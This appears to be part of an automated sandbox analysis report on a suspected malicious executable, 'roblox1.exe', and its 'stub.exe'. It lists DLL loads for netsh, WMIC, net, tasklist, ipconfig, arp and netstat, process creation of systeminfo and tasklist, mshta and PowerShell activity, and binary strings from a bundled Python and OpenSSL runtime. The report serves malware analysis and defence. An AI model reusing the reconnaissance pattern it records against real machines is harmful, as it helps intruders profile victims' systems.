                  Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
                  Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
                  Source: C:\Windows\System32\query.exe Section loaded: regapi.dll
                  Source: C:\Windows\System32\quser.exe Section loaded: winsta.dll
                  Source: C:\Windows\System32\quser.exe Section loaded: utildll.dll
                  Source: C:\Windows\System32\quser.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\quser.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
                  Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
                  Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
                  Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\net1.exe Section loaded: samlib.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\ROUTE.EXE Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ROUTE.EXE Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ROUTE.EXE Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ROUTE.EXE Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\ARP.EXE Section loaded: snmpapi.dll
                  Source: C:\Windows\System32\ARP.EXE Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ARP.EXE Section loaded: inetmib1.dll
                  Source: C:\Windows\System32\ARP.EXE Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ARP.EXE Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ARP.EXE Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\NETSTAT.EXE Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\NETSTAT.EXE Section loaded: snmpapi.dll
                  Source: C:\Windows\System32\NETSTAT.EXE Section loaded: inetmib1.dll
                  Source: C:\Windows\System32\NETSTAT.EXE Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
                  Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
                  Source: C:\Users\user\Desktop\roblox1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                  Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
                  Source: C:\Windows\System32\mshta.exe Automated click: OK
                  Source: C:\Windows\System32\query.exe Automated click: OK
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: roblox1.exe Static PE information: Image base 0x140000000 > 0x60000000
                  Source: roblox1.exe Static file information: File size 11168256 > 1048576
                  Source: roblox1.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xa85400
                  Source: roblox1.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdbc source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap` source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_uuid.pdb source: stub.exe, 00000003.00000002.1965068421.00007FFBBBE92000.00000002.00000001.01000000.00000020.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945909540.00000213BE720000.00000002.00000001.01000000.0000000E.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1965877888.00007FFBBC260000.00000002.00000001.01000000.00000007.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: stub.exe, 00000003.00000002.1964238411.00007FFBBB553000.00000002.00000001.01000000.00000025.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: stub.exe, 00000003.00000002.1964051788.00007FFBBAF4C000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1961361267.00007FFBAAD33000.00000002.00000001.01000000.00000005.sdmp
                  Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: roblox1.exe, 00000000.00000003.1539994673.000001B3013F1000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1954163213.00007FFBAA16F000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: k1k2k3X9_62_PENTANOMIALp.otherp.onBasisp.tpBasisp.ppBasismX9_62_CHARACTERISTIC_TWOp.primep.char_twofieldTypeX9_62_FIELDIDX9_62_CURVEfieldIDcurvebaseECPARAMETERSvalue.named_curvevalue.parametersvalue.implicitlyCAECPKPARAMETERSprivateKeyparameterspublicKeyEC_PRIVATEKEYec_asn1_group2fieldidcrypto\ec\ec_asn1.cec_asn1_group2curveEC_GROUP_get_ecparametersEC_GROUP_get_ecpkparametersEC_GROUP_new_from_ecparametersEC_GROUP_new_from_ecpkparametersi2d_ECPKParametersd2i_ECPrivateKeyi2d_ECPrivateKeyi2d_ECParametersd2i_ECParameterso2i_ECPublicKeyi2o_ECPublicKeycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Tue Sep 3 19:22:24 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1963452510.00007FFBB5C17000.00000002.00000001.01000000.00000015.sdmp
